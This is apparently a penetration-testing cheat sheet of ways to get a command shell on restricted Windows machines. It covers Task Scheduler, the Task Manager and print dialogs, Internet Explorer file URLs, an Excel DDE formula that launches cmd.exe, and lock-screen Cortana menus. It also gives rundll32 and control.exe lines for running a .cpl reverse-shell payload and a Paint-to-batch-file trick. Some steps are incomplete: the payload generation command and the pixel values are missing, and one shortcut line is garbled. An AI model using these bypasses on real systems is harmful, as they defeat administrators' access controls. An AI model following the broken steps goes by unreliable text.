Windows utilities
Windows utilities that can be used to bypass restrictions
Last updated
Windows utilities that can be used to bypass restrictions
Last updated
We can try and create a file a new text file and save at as file.bat with the content of cmd.exe , double click on the file and a cmd will open.
McAfee uncovered and documented the security flaws in a lengthy blog post, with one simple issue being the fact that you could trigger the voice assistant from the lock screen (assuming Cortana is enabled in this respect, on default settings), and bring up a contextual Windows 10 menu simply by typing while Cortana is listening to a query.
simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below
An interesting weakness, where some systems prevent access to cmd.exe, however it can still be scheduled to run via Task Scheduler. This can be done either via the command line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (i.e. 1 minute in the future) or upon certain events such as when a user logs on.
We can use it to make it run powershell from the path:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
When a user logout and log back in
Task Manager: CTRL+SHIFT+ESC -> File -> Run New Task
Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe
Get a cmd shell in Internet Explorer:
Enter in address bar:
file://C:\Windows\System32\cmd.exe
Developer Tools: Press F12 -> Performance Tab -> Press on 3rd icon "Importing Profile Session"
Get a cmd.exe shell using Excel:
Place this in a cell and press enter:
=cmd|' /k cmd.exe'!'A1'
Get a cmd.exe or Powershell shell using Windows search:
press Windows key and enter search. Note that admins frequently block cmd.exe and Powershell but forget to block Powershell ISE.
Try shortcuts:
Shift * 5 = 5 sticky key
Alt + F4 = shutdown computer
Win + R = run
Ctrl + Shift + esc = task manager
Ctrl + alt + delete = help menu (task manager, change password , etc)
Generating a simple x64 reverse shell in a .cpl format:
Invoking the shellcode via control.exe:
control.exe .\FlashPlayerCPLApp.cpl
# or
rundll32.exe shell32.dll,Control_RunDLL file.cpl
# or
rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl
An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.
Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
Zoom in to make the following tasks easier
Using the colour picker, set pixels values to (from left to right):
Save it as 24-bit Bitmap (*.bmp;*.dib)
Change its extension from bmp to bat and run.
